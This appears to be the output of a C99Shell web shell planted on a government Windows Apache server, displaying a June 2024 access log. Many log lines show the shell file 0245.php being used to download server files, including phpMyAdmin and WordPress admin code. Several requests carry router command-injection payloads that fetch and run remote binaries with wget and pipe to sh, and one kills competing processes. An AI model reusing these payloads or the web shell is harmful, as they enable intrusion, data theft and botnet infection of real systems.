!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2024.06.23.log (1.29 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.244.66.195 - - [23/Jun/2024:00:00:12 -0500] "GET /BLA/resoluciones/AUTOS%202007/0656.pdf HTTP/1.1" 200 148208
216.244.66.195 - - [23/Jun/2024:00:00:35 -0500] "GET /BLA/resoluciones/AUTOS%202007/0681.pdf HTTP/1.1" 200 166893
66.249.66.20 - - [23/Jun/2024:00:00:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4519.pdf HTTP/1.1" 200 372338
216.244.66.195 - - [23/Jun/2024:00:01:12 -0500] "GET /BLA/resoluciones/AUTOS%202007/0763.pdf HTTP/1.1" 200 44016
66.249.66.20 - - [23/Jun/2024:00:01:38 -0500] "GET /Publicaciones/2023EE125321.pdf HTTP/1.1" 404 228
216.244.66.195 - - [23/Jun/2024:00:01:44 -0500] "GET /BLA/resoluciones/AUTOS%202007/0779.pdf HTTP/1.1" 200 180501
66.249.66.19 - - [23/Jun/2024:00:01:57 -0500] "GET /resoluciones/RESOLUCIONES%202008/1042.pdf HTTP/1.1" 404 1018
216.244.66.195 - - [23/Jun/2024:00:02:24 -0500] "GET /BLA/resoluciones/AUTOS%202007/0875.pdf HTTP/1.1" 200 67742
216.245.221.92 - - [23/Jun/2024:00:02:32 -0500] "HEAD / HTTP/1.1" 200 -
69.63.184.20 - - [23/Jun/2024:00:02:37 -0500] "GET /robots.txt HTTP/1.1" 404 1018
69.63.184.2 - - [23/Jun/2024:00:02:37 -0500] "GET /robots.txt HTTP/1.1" 404 1018
69.63.184.20 - - [23/Jun/2024:00:02:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3964.pdf HTTP/1.1" 200 293557
69.63.184.126 - - [23/Jun/2024:00:02:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3964.pdf HTTP/1.1" 200 293557
216.244.66.195 - - [23/Jun/2024:00:02:55 -0500] "GET /BLA/resoluciones/AUTOS%202007/0964.pdf HTTP/1.1" 200 289245
47.128.55.6 - - [23/Jun/2024:00:03:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0826.pdf&ft=download HTTP/1.1" 200 450215
216.244.66.195 - - [23/Jun/2024:00:03:28 -0500] "GET /BLA/resoluciones/AUTOS%202007/1024.pdf HTTP/1.1" 200 256826
216.244.66.195 - - [23/Jun/2024:00:04:05 -0500] "GET /BLA/resoluciones/AUTOS%202007/1237.pdf HTTP/1.1" 200 547304
139.180.156.80 - - [23/Jun/2024:00:03:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6205.pdf&ft=download HTTP/1.1" 200 365002
201.245.192.253 - - [23/Jun/2024:00:04:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:04:40 -0500] "GET /BLA/resoluciones/AUTOS%202007/1253.pdf HTTP/1.1" 200 63685
216.244.66.195 - - [23/Jun/2024:00:05:12 -0500] "GET /BLA/resoluciones/AUTOS%202007/1649.pdf HTTP/1.1" 200 308411
216.244.66.195 - - [23/Jun/2024:00:05:40 -0500] "GET /BLA/resoluciones/AUTOS%202007/1744.pdf HTTP/1.1" 200 35488
216.244.66.195 - - [23/Jun/2024:00:06:08 -0500] "GET /BLA/resoluciones/AUTOS%202007/1806.pdf HTTP/1.1" 200 32863
52.230.152.167 - - [23/Jun/2024:00:06:28 -0500] "GET /distrito-exalto-a-246-empresas-de-bogota-por-su-alto-desempeno-y-responsabilidad-ambiental-durante-2023.html HTTP/1.1" 200 1039
52.230.152.167 - - [23/Jun/2024:00:06:32 -0500] "GET /el-bienestar-de-las-familias-sera-el-tema-central-del-distrito-en-el-mes-de-mayo-bajo-el-lema-nos-movemos-por-las-familias-bogotaavanzaenfamilia.html HTTP/1.1" 200 1139
216.244.66.195 - - [23/Jun/2024:00:06:33 -0500] "GET /BLA/resoluciones/AUTOS%202009/0830.pdf HTTP/1.1" 200 82815
216.244.66.195 - - [23/Jun/2024:00:06:58 -0500] "GET /BLA/resoluciones/AUTOS%202009/0888.pdf HTTP/1.1" 200 120993
47.128.98.38 - - [23/Jun/2024:00:07:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=PMA.php&ft=download HTTP/1.1" 200 2127
216.244.66.195 - - [23/Jun/2024:00:07:22 -0500] "GET /BLA/resoluciones/AUTOS%202009/1203.pdf HTTP/1.1" 200 128608
216.245.221.92 - - [23/Jun/2024:00:07:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:00:07:48 -0500] "GET /BLA/resoluciones/AUTOS%202009/1248.pdf HTTP/1.1" 200 425278
139.180.136.106 - - [23/Jun/2024:00:07:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=mime.lib.php&ft=download HTTP/1.1" 200 744
216.244.66.195 - - [23/Jun/2024:00:08:11 -0500] "GET /BLA/resoluciones/AUTOS%202009/1253.pdf HTTP/1.1" 200 171446
216.244.66.195 - - [23/Jun/2024:00:08:32 -0500] "GET /BLA/resoluciones/AUTOS%202009/1415.pdf HTTP/1.1" 200 190065
216.244.66.195 - - [23/Jun/2024:00:08:55 -0500] "GET /BLA/resoluciones/AUTOS%202009/1572.pdf HTTP/1.1" 200 123871
216.244.66.195 - - [23/Jun/2024:00:09:14 -0500] "GET /BLA/resoluciones/AUTOS%202009/1645.pdf HTTP/1.1" 200 98701
185.224.128.43 - - [23/Jun/2024:00:09:19 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [23/Jun/2024:00:09:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:09:32 -0500] "GET /BLA/resoluciones/AUTOS%202009/1927.pdf HTTP/1.1" 200 122956
216.244.66.195 - - [23/Jun/2024:00:09:49 -0500] "GET /BLA/resoluciones/AUTOS%202009/2021.pdf HTTP/1.1" 200 99507
216.244.66.195 - - [23/Jun/2024:00:10:05 -0500] "GET /BLA/resoluciones/AUTOS%202009/2417.pdf HTTP/1.1" 200 102210
216.244.66.195 - - [23/Jun/2024:00:10:20 -0500] "GET /BLA/resoluciones/AUTOS%202009/2669.pdf HTTP/1.1" 200 76815
216.244.66.195 - - [23/Jun/2024:00:10:34 -0500] "GET /BLA/resoluciones/AUTOS%202009/2875.pdf HTTP/1.1" 200 68077
216.244.66.195 - - [23/Jun/2024:00:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202009/2903.pdf HTTP/1.1" 200 88972
152.61.192.232 - - [23/Jun/2024:00:10:54 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [23/Jun/2024:00:11:01 -0500] "GET /BLA/resoluciones/AUTOS%202011/0151.pdf HTTP/1.1" 200 129259
216.244.66.195 - - [23/Jun/2024:00:11:12 -0500] "GET /BLA/resoluciones/AUTOS%202011/0184.pdf HTTP/1.1" 200 151836
216.244.66.195 - - [23/Jun/2024:00:11:22 -0500] "GET /BLA/resoluciones/AUTOS%202011/0223.pdf HTTP/1.1" 200 140201
47.128.46.145 - - [23/Jun/2024:00:11:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3391.pdf&ft=download HTTP/1.1" 200 20135
216.244.66.195 - - [23/Jun/2024:00:11:31 -0500] "GET /BLA/resoluciones/AUTOS%202011/0874.pdf HTTP/1.1" 200 103788
216.244.66.195 - - [23/Jun/2024:00:11:39 -0500] "GET /BLA/resoluciones/AUTOS%202011/1287.pdf HTTP/1.1" 200 78840
216.244.66.195 - - [23/Jun/2024:00:11:48 -0500] "GET /BLA/resoluciones/AUTOS%202011/1505.pdf HTTP/1.1" 200 274572
167.99.70.135 - - [23/Jun/2024:00:11:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=huella_carbono.html&ft=download&white=1 HTTP/1.1" 200 5190
185.191.127.212 - - [23/Jun/2024:00:11:53 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
216.244.66.195 - - [23/Jun/2024:00:11:54 -0500] "GET /BLA/resoluciones/AUTOS%202011/1769.pdf HTTP/1.1" 200 263862
216.244.66.195 - - [23/Jun/2024:00:11:59 -0500] "GET /BLA/resoluciones/AUTOS%202011/2433.pdf HTTP/1.1" 200 271677
216.244.66.195 - - [23/Jun/2024:00:12:04 -0500] "GET /BLA/resoluciones/AUTOS%202011/2638.pdf HTTP/1.1" 200 160659
216.244.66.195 - - [23/Jun/2024:00:12:12 -0500] "GET /BLA/resoluciones/AUTOS%202011/2693.pdf HTTP/1.1" 200 116500
52.167.144.137 - - [23/Jun/2024:00:12:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/4060.pdf HTTP/1.1" 200 397008
216.244.66.195 - - [23/Jun/2024:00:12:20 -0500] "GET /BLA/resoluciones/AUTOS%202011/2797.pdf HTTP/1.1" 200 241309
216.245.221.92 - - [23/Jun/2024:00:12:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:00:12:32 -0500] "GET /BLA/resoluciones/AUTOS%202011/2868.pdf HTTP/1.1" 200 366573
216.244.66.195 - - [23/Jun/2024:00:12:43 -0500] "GET /BLA/resoluciones/AUTOS%202011/2949.pdf HTTP/1.1" 200 501125
216.244.66.195 - - [23/Jun/2024:00:12:53 -0500] "GET /BLA/resoluciones/AUTOS%202011/2999.pdf HTTP/1.1" 200 259215
216.244.66.195 - - [23/Jun/2024:00:13:02 -0500] "GET /BLA/resoluciones/AUTOS%202011/3019.pdf HTTP/1.1" 200 105120
216.244.66.195 - - [23/Jun/2024:00:13:10 -0500] "GET /BLA/resoluciones/AUTOS%202011/3032.pdf HTTP/1.1" 200 151485
216.244.66.195 - - [23/Jun/2024:00:13:16 -0500] "GET /BLA/resoluciones/AUTOS%202011/3071.pdf HTTP/1.1" 200 248347
216.244.66.195 - - [23/Jun/2024:00:13:22 -0500] "GET /BLA/resoluciones/AUTOS%202011/3245.pdf HTTP/1.1" 200 228009
216.244.66.195 - - [23/Jun/2024:00:13:27 -0500] "GET /BLA/resoluciones/AUTOS%202011/3307.pdf HTTP/1.1" 200 265033
216.244.66.195 - - [23/Jun/2024:00:13:32 -0500] "GET /BLA/resoluciones/AUTOS%202011/3330.pdf HTTP/1.1" 200 257397
216.244.66.195 - - [23/Jun/2024:00:13:36 -0500] "GET /BLA/resoluciones/AUTOS%202011/3421.pdf HTTP/1.1" 200 243715
216.244.66.195 - - [23/Jun/2024:00:13:39 -0500] "GET /BLA/resoluciones/AUTOS%202011/3528.pdf HTTP/1.1" 200 521456
216.244.66.195 - - [23/Jun/2024:00:13:46 -0500] "GET /BLA/resoluciones/AUTOS%202011/3802.pdf HTTP/1.1" 200 195355
216.244.66.195 - - [23/Jun/2024:00:13:51 -0500] "GET /BLA/resoluciones/AUTOS%202019/0023.pdf HTTP/1.1" 200 287929
216.244.66.195 - - [23/Jun/2024:00:13:55 -0500] "GET /BLA/resoluciones/AUTOS%202019/0042.pdf HTTP/1.1" 200 317090
216.244.66.195 - - [23/Jun/2024:00:13:59 -0500] "GET /BLA/resoluciones/AUTOS%202019/0270.pdf HTTP/1.1" 200 247487
216.244.66.195 - - [23/Jun/2024:00:14:03 -0500] "GET /BLA/resoluciones/AUTOS%202019/0448.pdf HTTP/1.1" 200 265375
216.244.66.195 - - [23/Jun/2024:00:14:06 -0500] "GET /BLA/resoluciones/AUTOS%202019/1452.pdf HTTP/1.1" 200 261673
216.244.66.195 - - [23/Jun/2024:00:14:08 -0500] "GET /BLA/resoluciones/AUTOS%202019/2245.pdf HTTP/1.1" 200 265493
216.244.66.195 - - [23/Jun/2024:00:14:11 -0500] "GET /BLA/resoluciones/AUTOS%202019/2497.pdf HTTP/1.1" 200 562972
216.244.66.195 - - [23/Jun/2024:00:14:14 -0500] "GET /BLA/resoluciones/AUTOS%202019/2844.pdf HTTP/1.1" 200 339237
201.245.192.253 - - [23/Jun/2024:00:13:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:14:25 -0500] "GET /BLA/resoluciones/AUTOS%202019/2858.pdf HTTP/1.1" 200 266879
216.244.66.195 - - [23/Jun/2024:00:14:34 -0500] "GET /BLA/resoluciones/AUTOS%202019/2967.pdf HTTP/1.1" 200 254423
47.128.30.99 - - [23/Jun/2024:00:15:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=gallery.js&ft=download&white=1 HTTP/1.1" 200 5505
139.180.136.106 - - [23/Jun/2024:00:15:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2201-2250&f=00002219.tif&ft=download HTTP/1.1" 200 324492
34.78.6.216 - - [23/Jun/2024:00:16:39 -0500] "GET / HTTP/1.1" 200 319
52.167.144.137 - - [23/Jun/2024:00:16:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0959.pdf HTTP/1.1" 200 558940
216.245.221.92 - - [23/Jun/2024:00:17:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:00:17:40 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:18:01 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:18:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
47.128.45.115 - - [23/Jun/2024:00:19:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3744.pdf&ft=download HTTP/1.1" 200 20135
139.59.227.173 - - [23/Jun/2024:00:19:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/server_user_groups.php%27%20%20%20%20%20%20%20%20.%20PMA_URL_getCommon(array(%27addUserGroup%27%20=%3E%201))%20.%20%27 HTTP/1.1" 403 1006
201.245.192.253 - - [23/Jun/2024:00:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:20:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
66.249.66.21 - - [23/Jun/2024:00:21:23 -0500] "GET /Publicaciones/2024EE87015.pdf HTTP/1.1" 404 227
216.244.66.195 - - [23/Jun/2024:00:21:52 -0500] "GET /robots.txt HTTP/1.1" 404 1018
216.245.221.92 - - [23/Jun/2024:00:22:32 -0500] "HEAD / HTTP/1.1" 200 -
173.252.79.4 - - [23/Jun/2024:00:23:40 -0500] "GET /images/mercados-campesinos-5-mayo.jpg HTTP/1.1" 200 95848
47.128.31.143 - - [23/Jun/2024:00:23:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300&f=00002270.tif&ft=download HTTP/1.1" 200 274083
40.77.167.33 - - [23/Jun/2024:00:24:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20801%20AL%20900/RESOLUCION%200813%20DE%202007.pdf HTTP/1.1" 200 270978
201.245.192.253 - - [23/Jun/2024:00:23:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
66.249.66.21 - - [23/Jun/2024:00:24:23 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000002%20DEL%2022%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 304 -
66.249.66.20 - - [23/Jun/2024:00:25:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/5920.pdf HTTP/1.1" 304 -
216.245.221.92 - - [23/Jun/2024:00:27:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:00:27:40 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:28:01 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
47.128.98.252 - - [23/Jun/2024:00:28:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000208.tif&ft=download HTTP/1.1" 200 40042
45.77.253.75 - - [23/Jun/2024:00:27:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2483.pdf&ft=download&white=1 HTTP/1.1" 200 374327
201.245.192.253 - - [23/Jun/2024:00:28:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:29:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:30:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
152.61.128.50 - - [23/Jun/2024:00:30:56 -0500] "GET / HTTP/1.1" 200 319
157.245.149.246 - - [23/Jun/2024:00:31:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2694.pdf&ft=download HTTP/1.1" 200 368144
47.128.126.101 - - [23/Jun/2024:00:32:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1-50&f=00000005.tif&ft=download HTTP/1.1" 200 40310
216.245.221.92 - - [23/Jun/2024:00:32:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jun/2024:00:33:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
52.167.144.166 - - [23/Jun/2024:00:35:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/2151.pdf HTTP/1.1" 304 -
139.59.227.173 - - [23/Jun/2024:00:35:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Chuelladecarbono%5C&f=cambio_climatico.html&ft=download&white=1 HTTP/1.1" 200 7770
47.128.27.103 - - [23/Jun/2024:00:36:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctmp%5C&f=phpAA89.tmp&ft=download&white=1 HTTP/1.1" 200 290468
3.20.63.178 - - [23/Jun/2024:00:36:48 -0500] "GET / HTTP/1.1" 200 319
66.249.66.21 - - [23/Jun/2024:00:37:25 -0500] "GET /bla/resoluciones/RESOLUCIONES%202010/7515.pdf HTTP/1.1" 200 161432
216.245.221.92 - - [23/Jun/2024:00:37:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:00:37:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2358.pdf HTTP/1.1" 200 539271
201.245.192.253 - - [23/Jun/2024:00:37:40 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:38:01 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:38:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2419.pdf HTTP/1.1" 200 355552
201.245.192.253 - - [23/Jun/2024:00:38:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:39:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0980.pdf HTTP/1.1" 200 5914811
216.244.66.195 - - [23/Jun/2024:00:40:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1107.pdf HTTP/1.1" 200 804590
139.180.158.163 - - [23/Jun/2024:00:40:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=comment.php&ft=download HTTP/1.1" 200 10236
201.245.192.253 - - [23/Jun/2024:00:39:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
201.245.192.253 - - [23/Jun/2024:00:40:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 503 1020
47.128.27.83 - - [23/Jun/2024:00:40:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3281.pdf&ft=download HTTP/1.1" 200 20135
216.244.66.195 - - [23/Jun/2024:00:40:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1128.pdf HTTP/1.1" 200 532062
216.244.66.195 - - [23/Jun/2024:00:41:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1150.pdf HTTP/1.1" 200 370859
18.116.205.62 - - [23/Jun/2024:00:42:02 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [23/Jun/2024:00:42:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1632.pdf HTTP/1.1" 200 315413
66.249.66.19 - - [23/Jun/2024:00:42:21 -0500] "GET /BLA/resoluciones/AUTOS%202007/3425.pdf HTTP/1.1" 200 164243
216.245.221.92 - - [23/Jun/2024:00:42:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:00:42:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1828.pdf HTTP/1.1" 200 369555
216.244.66.195 - - [23/Jun/2024:00:43:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1941.pdf HTTP/1.1" 200 373400
66.249.66.21 - - [23/Jun/2024:00:43:41 -0500] "GET /BLA/resoluciones/Autos%202008/2873.pdf HTTP/1.1" 200 228656
143.198.219.104 - - [23/Jun/2024:00:43:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=tools.php&ft=download&white=1 HTTP/1.1" 200 5579
201.245.192.253 - - [23/Jun/2024:00:43:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:44:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2310.pdf HTTP/1.1" 200 304002
141.98.83.197 - - [23/Jun/2024:00:44:37 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [23/Jun/2024:00:44:38 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
216.244.66.195 - - [23/Jun/2024:00:44:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2359.pdf HTTP/1.1" 200 281057
47.128.27.55 - - [23/Jun/2024:00:44:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4622.pdf&ft=download HTTP/1.1" 200 20135
216.244.66.195 - - [23/Jun/2024:00:45:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2478.pdf HTTP/1.1" 200 279739
216.244.66.195 - - [23/Jun/2024:00:45:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2501.pdf HTTP/1.1" 200 342404
216.244.66.195 - - [23/Jun/2024:00:46:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2688.pdf HTTP/1.1" 200 281841
3.20.63.178 - - [23/Jun/2024:00:46:43 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:00:47:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2691.pdf HTTP/1.1" 200 276217
216.245.221.92 - - [23/Jun/2024:00:47:32 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [23/Jun/2024:00:47:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2807.pdf HTTP/1.1" 200 273034
45.32.114.132 - - [23/Jun/2024:00:48:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=language_stats.inc.php&ft=download HTTP/1.1" 200 1380
216.244.66.195 - - [23/Jun/2024:00:48:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3069.pdf HTTP/1.1" 200 304226
47.128.27.30 - - [23/Jun/2024:00:48:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=nav-menus.php&ft=download HTTP/1.1" 200 38832
201.245.192.253 - - [23/Jun/2024:00:48:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
216.244.66.195 - - [23/Jun/2024:00:49:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3356.pdf HTTP/1.1" 200 5182694
216.244.66.195 - - [23/Jun/2024:00:50:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3754.pdf HTTP/1.1" 200 314580
216.244.66.195 - - [23/Jun/2024:00:50:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0556.pdf HTTP/1.1" 200 228440
216.244.66.195 - - [23/Jun/2024:00:51:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1313.pdf HTTP/1.1" 200 410563
216.244.66.195 - - [23/Jun/2024:00:51:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1391.pdf HTTP/1.1" 200 230306
139.180.146.78 - - [22/Jun/2024:23:11:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2000+1000-1049.tif&ft=download&white=1 HTTP/1.1" 200 3858076
216.244.66.195 - - [23/Jun/2024:00:52:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2140.pdf HTTP/1.1" 200 289944
216.245.221.92 - - [23/Jun/2024:00:52:32 -0500] "HEAD / HTTP/1.1" 200 -
17.241.219.201 - - [23/Jun/2024:00:52:32 -0500] "GET /robots.txt HTTP/1.1" 404 1018
17.241.219.201 - - [23/Jun/2024:00:52:33 -0500] "GET /BLA/boletinlegal/documentos-importantes.php HTTP/1.1" 200 4883
216.244.66.195 - - [23/Jun/2024:00:52:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2327.pdf HTTP/1.1" 200 281451
47.128.126.10 - - [23/Jun/2024:00:53:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000222.tif&ft=download HTTP/1.1" 200 20131
